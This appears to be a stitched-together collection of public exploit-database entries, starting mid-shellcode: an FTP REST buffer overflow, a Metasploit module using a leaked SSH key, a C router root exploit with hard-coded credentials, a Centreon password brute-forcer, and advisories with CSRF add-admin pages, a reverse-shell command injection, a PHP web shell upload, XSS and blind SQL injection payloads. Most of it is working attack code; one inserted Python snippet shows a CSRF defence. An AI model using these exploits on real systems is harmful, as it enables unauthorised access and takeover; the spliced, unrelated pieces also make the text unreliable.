"\x6b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4a\x73\x4e\x6b\x43"
"\x34\x4e\x6b\x47\x71\x48\x50\x4c\x49\x51\x54\x51\x34\x45"
"\x74\x43\x6b\x43\x6b\x50\x61\x46\x39\x51\x4a\x42\x71\x4b"
"\x4f\x4d\x30\x50\x58\x51\x4f\x50\x5a\x4e\x6b\x46\x72\x4a"
"\x4b\x4b\x36\x43\x6d\x51\x7a\x46\x61\x4e\x6d\x4f\x75\x4d"
"\x69\x43\x30\x47\x70\x45\x50\x50\x50\x42\x48\x44\x71\x4c"
"\x4b\x50\x6f\x4b\x37\x4b\x4f\x4a\x75\x4f\x4b\x4a\x50\x4d"
"\x65\x4e\x42\x42\x76\x50\x68\x4e\x46\x4e\x75\x4f\x4d\x4d"
"\x4d\x4b\x4f\x4e\x35\x47\x4c\x44\x46\x51\x6c\x44\x4a\x4d"
"\x50\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x47\x37\x45"
"\x43\x51\x62\x50\x6f\x42\x4a\x47\x70\x50\x53\x49\x6f\x49"
"\x45\x50\x63\x51\x71\x42\x4c\x42\x43\x46\x4e\x50\x65\x51"
"\x68\x43\x55\x45\x50\x41\x41")
buf = "\x41" * 244
buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
buf += "\x90" * 50
buf += shellcode
print "[+]Connecting with server..."
sleep(1)
try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    s.recv(1024)
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    s.send("REST "+buf+"\r\n")
    s.close()
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))# Connected again to Crash and BOF
    sleep(1)
    s.close()# Close connection and Crash!!!
    print "[+]Exploit sent with success"
except:
    print "[-]Error in connection with server: "+ip
#=====[ The End ]=======|
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a CSRF vulnerability in the Cerb platform, which can be exploited to perform Cross-Site Request Forgery attacks against administrators of the vulnerable web application in order to add administrator accounts to the system.
The vulnerability exists because the "/ajax.php" script fails to properly verify the source of incoming HTTP requests. Taking into consideration that Cerb is a business-critical application, this security flaw may be quite dangerous if exploited by malicious attackers.
The simple exploit below will add an admin user to the system when a logged-in victim opens a malicious page containing it:
<form action="http://[host]/ajax.php" method = "POST">
<input type="hidden" name="c" value="config">
<input type="hidden" name="a" value="handleSectionAction">
<input type="hidden" name="section" value="workers">
<input type="hidden" name="action" value="saveWorkerPeek">
<input type="hidden" name="id" value="0">
<input type="hidden" name="view_id" value="workers_cfg">
<input type="hidden" name="do_delete" value="0">
<input type="hidden" name="first_name" value="first name">
<input type="hidden" name="last_name" value="last name">
<input type="hidden" name="title" value="title">
<input type="hidden" name="email" value="username@mail.com">
<input type="hidden" name="at_mention_name" value="name">
<input type="hidden" name="is_disabled" value="0">
<input type="hidden" name="is_superuser" value="1">
<input type="hidden" name="lang_code" value="en_US">
<input type="hidden" name="timezone" value="Antarctica%2FTroll">
<input type="hidden" name="time_format" value="D%2C+d+M+Y+h%3Ai+a">
<input type="hidden" name="auth_extension_id" value="login.password">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_verify" value="password">
<input type="hidden" name="calendar_id" value="new">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
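The two checks such an endpoint needs, as an added example (not Cerb's code): a source check on Origin/Referer plus a session-bound CSRF token, run against the forged saveWorkerPeek request above and against a legitimate one. Requests are modelled as a headers dict and a form dict; SITE_ORIGIN, the _csrf_token field name and the sample values are my assumptions.

```python
"""Source check plus session-bound token for a state-changing endpoint such as
Cerb's /ajax.php (the saveWorkerPeek action the advisory forges).

Added example for advisory HTB23269; not Cerb's code.  SITE_ORIGIN, TOKEN_FIELD
and the sample request are assumptions made for the example.  Standard library only.
"""
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_ORIGIN = "https://helpdesk.example"   # assumed deployment origin (scheme + host)
TOKEN_FIELD = "_csrf_token"

# The forged POST from the advisory as the server would receive it (constructed).
FORGED_FORM = {
    "c": "config", "a": "handleSectionAction", "section": "workers",
    "action": "saveWorkerPeek", "id": "0", "email": "username@mail.com",
    "is_superuser": "1", "auth_extension_id": "login.password",
    "password_new": "password", "password_verify": "password",
}
FORGED_HEADERS = {"Origin": "https://attacker.example",
                  "Referer": "https://attacker.example/page.html",
                  "Cookie": "Devblocks=abc123"}   # the victim's session cookie rides along


def issue_csrf_token(session_id, server_secret):
    """Bind the token to the session: HMAC(secret, session id).  A page on another
    origin cannot read the victim's cookie, so it cannot compute this value."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Origin if present, else scheme://host from Referer, else None."""
    origin = headers.get("Origin")
    if origin and origin != "null":
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return "%s://%s" % (parts.scheme, parts.netloc)
    return None


def is_request_allowed(headers, form, session_id, server_secret):
    """Return (allowed, reason).  A state-changing action needs both checks: the
    source check stops a plain cross-site form post, and the token stops anything
    that manages to strip or spoof headers but still cannot read the session."""
    origin = request_origin(headers)
    if origin is None:
        return False, "no Origin or Referer"   # neither present: treat as cross-site
    if origin != SITE_ORIGIN:
        return False, "cross-site origin %s" % origin
    expected = issue_csrf_token(session_id, server_secret)
    supplied = form.get(TOKEN_FIELD, "")
    # Constant-time comparison; encode so arbitrary input cannot raise on non-ASCII.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    secret = b"constructed-server-secret"
    sid = "victim-session-1"
    print(is_request_allowed(FORGED_HEADERS, FORGED_FORM, sid, secret))
    legit = dict(FORGED_FORM, **{TOKEN_FIELD: issue_csrf_token(sid, secret)})
    print(is_request_allowed({"Origin": SITE_ORIGIN}, legit, sid, secret))
```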
-----------------------------------------------------------------------------------------------
Solution:
Update to Cerb 7.0.4
More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23269 - https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Auxiliary::Report
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info, {
'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
'Description' => %q{
Ceragon ships a public/private key pair on FibeAir IP-10 devices
that allows passwordless authentication to any other IP-10 device.
Since the key is easily retrievable, an attacker can use it to
gain unauthorized remote access as the "mateidu" user.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => [
'hdm', # Discovery
'todb' # Metasploit module and advisory text (mostly copy-paste)
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-0936'],
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
],
'DisclosureDate' => "Apr 01 2015", # Not a joke
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user)
factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
opt_hash = {
auth_methods: ['publickey'],
port: rport,
key_data: [ key_data ],
use_agent: false,
config: false,
proxy: factory,
non_interactive: true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, user, opt_hash)
end
rescue Rex::ConnectionError
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
ssh_socket = nil
return conn
else
return nil
end
end
def exploit
conn = do_login("mateidu")
if conn
print_good "#{rhost}:#{rport} - Successful login"
handler(conn.lsock)
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
EOF
end
end
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */
/* Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown */
/* uid=0(root) gid=0(root) */
/* # */
/* */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#define END_STRING "chau\n"
#define COMPLETE_STRING "fin-respuesta"
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL SO_NOSIGPIPE
#endif
#define perro(x) \
{ \
fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, x, \
strerror(errno)); \
exit(1); \
}
/* Walk the router's telnet login and 'su root' prompts with the hard-coded
   credentials.  The pid argument is unused. */
void send_root(int sock, int pid) {
  char buf[1024] = {0};
  char getal[1024] = "\x61\x64\x6d\x69\x6e\x0a";                         /* login name (hex-encoded) */
  char getap[1024] = "\x43\x65\x6e\x74\x75\x72\x79\x4c\x31\x6e\x6b\x0a"; /* login password */
  char getrl[1024] = "\x73\x75\x20\x72\x6f\x6f\x74\x0a";                 /* switch to root */
  char getrp[1024] = "\x7a\x79\x61\x64\x35\x30\x30\x31";                 /* root password, newline follows in sys_info */
  (void)pid;
  recv(sock, buf, sizeof buf - 1, 0); /* login prompt */
  sleep(1);
  if (send(sock, getal, strlen(getal) + 1, 0) < 0)
    perro("send");
  recv(sock, buf, sizeof buf - 1, 0); /* password prompt */
  sleep(1);
  if (send(sock, getap, strlen(getap) + 1, 0) < 0)
    perro("send");
  sleep(2);
  recv(sock, buf, sizeof buf - 1, 0); /* user shell prompt */
  if (send(sock, getrl, strlen(getrl) + 1, 0) < 0)
    perro("send");
  sleep(2);
  recv(sock, buf, sizeof buf - 1, 0); /* su password prompt */
  if (send(sock, getrp, strlen(getrp) + 1, 0) < 0)
    perro("send");
  sleep(2);
}
void send_cmd(int sock, int pid) {
char str[1024] = {0};
while (fgets(str, 1024, stdin) == str) {
if (strncmp(str, END_STRING, strlen(END_STRING)) == 0)
break;
if (send(sock, str, strlen(str) + 1, 0) < 0)
perro("send");
}
kill(pid, SIGKILL);
}
/* Ask the now-root shell who it is and echo the reply until the router closes
   the session, then stop the helper process whose pid was passed in. */
void sys_info(int sock, int pid) {
  char buf[1024] = {0};
  char sysinfo[1024] = "\nuname -a; id;\n";
  if (send(sock, sysinfo, strlen(sysinfo) + 1, 0) < 0)
    perro("send");
  sleep(1);
  int filled = 0;
  /* recv() returns 0 on close and -1 on error; stop on both instead of indexing buf[-1] */
  while ((filled = recv(sock, buf, sizeof buf - 1, 0)) > 0) {
    buf[filled] = '\0';
    printf("%s", buf);
    fflush(stdout);
  }
  kill(pid, SIGKILL);
}
/* Print everything the router sends until the connection is closed. */
void receive(int sock) {
  char buf[1024] = {0};
  int filled = 0;
  while ((filled = recv(sock, buf, sizeof buf - 1, 0)) > 0) {
    buf[filled] = '\0';
    printf("%s", buf);
    fflush(stdout);
  }
}
int main(int argc, char **argv) {
  if (argc != 2) {
    printf("PK5001Z CenturyLink Router remote root 0day\nEnjoy!\n");
    printf(" --oxagast\n");
    exit(1);
  }
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock == -1)
    perro("socket");
  struct in_addr server_addr;
  if (!inet_aton(argv[1], &server_addr))
    perro("inet_aton");
  struct sockaddr_in connection;
  memset(&connection, 0, sizeof(connection));
  connection.sin_family = AF_INET;
  memcpy(&connection.sin_addr, &server_addr, sizeof(server_addr));
  connection.sin_port = htons(23); /* the router's telnet service */
  if (connect(sock, (const struct sockaddr *)&connection, sizeof(connection)) != 0)
    perro("connect");
  sleep(2);
  send_root(sock, 0); /* pid argument is unused */
  /* The parent prints the uname/id banner and stops the child when the router
     closes the session; the child forks again into a stdin relay (send_cmd)
     and an output reader (receive).  The pids were uninitialised before. */
  pid_t pid_sys = fork();
  if (pid_sys < 0)
    perro("fork");
  if (pid_sys != 0) {
    sys_info(sock, pid_sys);
    return 0;
  }
  pid_t pid_shell = fork();
  if (pid_shell < 0)
    perro("fork");
  if (pid_shell != 0)
    send_cmd(sock, pid_shell);
  else
    receive(sock);
  return 0;
}
#!/usr/bin/env python3
# Exploit Title : Centreon 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
import sys
import requests
import argparse
from termcolor import colored
import os
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
    parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
    parser.add_argument('-l', dest='username', help='Specific username')
    parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
    parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
    parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
    parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    args = parser.parse_args()
    protocol = 'https' if args.https else 'http'
    server = f"{protocol}://{args.host}:{args.port}"
    user = args.username
    passfile = args.passwfile.read().splitlines()
    userfile = args.userfile
    dirlo = '/centreon/api/index.php?action=authenticate'
    verify_ssl = not args.insecure
    if args.ca_bundle:
        verify_ssl = args.ca_bundle
    if user:
        brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
    elif userfile:
        usrwl = userfile.read().splitlines()
        brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
    else:
        print(colored('Something went wrong!', 'red'))
        sys.exit(1)


def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
    for password in passfile:
        data = {'username': user, 'password': password}
        r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
        try:
            print('Processing...')
            print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
                  colored(' Username: ', 'yellow') + colored(user, 'yellow') +
                  colored(' Password: ', 'yellow') + colored(password, 'yellow'))
            if r.status_code == 200:
                print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
                      colored(' password: ', 'green') + colored(password, 'green') +
                      colored(' server: ', 'green') + colored(server, 'green'))
                print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                print('\n')
                break
            else:
                print(colored('403 - Unauthenticated!', 'red'))
        except IndexError:
            print(colored('Something went wrong', 'red'))


def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
    for usr in usrwl:
        for password in passfile:
            data = {'username': usr, 'password': password}
            r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
            try:
                print('Processing...')
                print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
                      colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
                      colored(' Password: ', 'yellow') + colored(password, 'yellow'))
                if r.status_code == 200:
                    print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
                          colored(' password: ', 'green') + colored(password, 'green') +
                          colored(' server: ', 'green') + colored(server, 'green'))
                    print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                    print('\n')
                else:
                    print(colored('403 - Unauthenticated!', 'red'))
            except IndexError:
                print(colored('Something went wrong', 'red'))


if __name__ == '__main__':
    main()
Centreon 2.6.1 Command Injection Vulnerability
Vendor: Centreon
Product web page: https://www.centreon.com
Affected version: 2.6.1 (CES 3.2)
Summary: Centreon is the choice of some of the world's largest
companies and mission-critical organizations for real-time IT
performance monitoring and diagnostics management.
Desc: The POST parameter 'persistant', which is used to make
a new service run in the background, is not properly sanitised
before being used to execute commands. This can be exploited
to inject and execute arbitrary shell commands, including
through cross-site request forgery attacks.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5265
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5265.php
10.08.2015
--
<<<<<<
root@zslab:~# curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' \
--data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' \
'http://localhost.localdomain/centreon/main.php?p=20218'
>>>>>>
root@zslab:~# nc -4 -l -n 6161 -vv -D
Connection from 127.0.0.1 port 6161 [tcp/*] accepted
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios)
bash-4.1$ uname -a;cat /etc/issue
uname -a;cat /etc/issue
Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Centreon Enterprise Server
Kernel \r on an \m
bash-4.1$ pwd
pwd
/usr/share/centreon/www
bash-4.1$ exit
exit
exit
root@zslab:~#
#################################################################
Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability
Desc: Centreon suffers from a stored XSS vulnerability. Input
passed through the POST parameter 'img_comment' is not sanitized,
allowing the attacker to execute HTML and script code in the
user's browser session on the affected site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5266
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5266.php
10.08.2015
--
POST /centreon/main.php?p=50102 HTTP/1.1
Host: localhost.localdomain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost.localdomain/centreon/main.php?p=50102&o=a
Cookie: PHPSESSID=qg580onenijim611sca8or3o32
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993
Content-Length: 1195
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="directories"
upload
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="list_dir"
0
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="filename"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?
phpinfo();
?>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_comment"
"><script>alert(1);</script>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="action[action]"
1
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="submitA"
Save
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_id"
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="o"
a
-----------------------------951909060822176775828135993--
#################################################################
Centreon 2.6.1 Unrestricted File Upload Vulnerability
Desc: The vulnerability is caused by the improper verification
of files uploaded via the 'filename' POST parameter. This can be
exploited to execute arbitrary PHP code by uploading a malicious
PHP script that is stored under the '/img/media/' directory.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5264
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5264.php
10.08.2015
--
<html>
<!-- Specified dir is 1337 and filename is shelly.php -->
<!-- Ex: http://localhost.localdomain/centreon/img/media/1337/shelly.php?c=id -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost.localdomain/centreon/main.php?p=50102", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------951909060822176775828135993");
xhr.withCredentials = true;
var body = "-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"directories\"\r\n" +
"\r\n" +
"1337\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"list_dir\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"filename\"; filename=\"shelly.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"echo \"\x3cpre\x3e\";system($_GET[\'c\']);echo \"\x3c\/pre\x3e\";\r\n" +
"?\x3e\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_comment\"\r\n" +
"\r\n" +
"peened\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"action[action]\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"submitA\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"2097152\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"o\"\r\n" +
"\r\n" +
"a\r\n" +
"-----------------------------951909060822176775828135993--";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#################################################################
Centreon 2.6.1 CSRF Add Admin Exploit
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5263
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
10.08.2015
--
<html>
<body>
<form action="http://localhost.localdomain/centreon/main.php?p=60301" method="POST">
<input type="hidden" name="contact_alias" value="Testingus" />
<input type="hidden" name="contact_name" value="Fullio" />
<input type="hidden" name="contact_email" value="test@test.tld" />
<input type="hidden" name="contact_pager" value="" />
<input type="hidden" name="contact_template_id" value="" />
<input type="hidden" name="contact_enable_notifications[contact_enable_notifications]" value="2" />
<input type="hidden" name="timeperiod_tp_id" value="" />
<input type="hidden" name="timeperiod_tp_id2" value="" />
<input type="hidden" name="contact_oreon[contact_oreon]" value="1" />
<input type="hidden" name="contact_passwd" value="123123" />
<input type="hidden" name="contact_passwd2" value="123123" />
<input type="hidden" name="contact_lang" value="en_US" />
<input type="hidden" name="contact_admin[contact_admin]" value="1" />
<input type="hidden" name="contact_autologin_key" value="" />
<input type="hidden" name="contact_auth_type" value="local" />
<input type="hidden" name="contact_acl_groups[]" value="31" />
<input type="hidden" name="contact_acl_groups[]" value="32" />
<input type="hidden" name="contact_acl_groups[]" value="34" />
<input type="hidden" name="contact_address1" value="Neverland" />
<input type="hidden" name="contact_address2" value="" />
<input type="hidden" name="contact_address3" value="101" />
<input type="hidden" name="contact_address4" value="" />
<input type="hidden" name="contact_address5" value="" />
<input type="hidden" name="contact_address6" value="" />
<input type="hidden" name="contact_activate[contact_activate]" value="1" />
<input type="hidden" name="contact_comment" value="comment-vuln-xss-t00t" />
<input type="hidden" name="action[action]" value="1" />
<input type="hidden" name="submitA" value="Save" />
<input type="hidden" name="contact_register" value="1" />
<input type="hidden" name="contact_id" value="" />
<input type="hidden" name="o" value="a" />
<input type="hidden" name="initialValues" value="a:0:{}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
CVEs: CVE-2015-1560, CVE-2015-1561
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)
Advisory introduction:
Centreon 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
The vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which the unsanitized "sid" GET parameter is used in an SQL query.
PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27
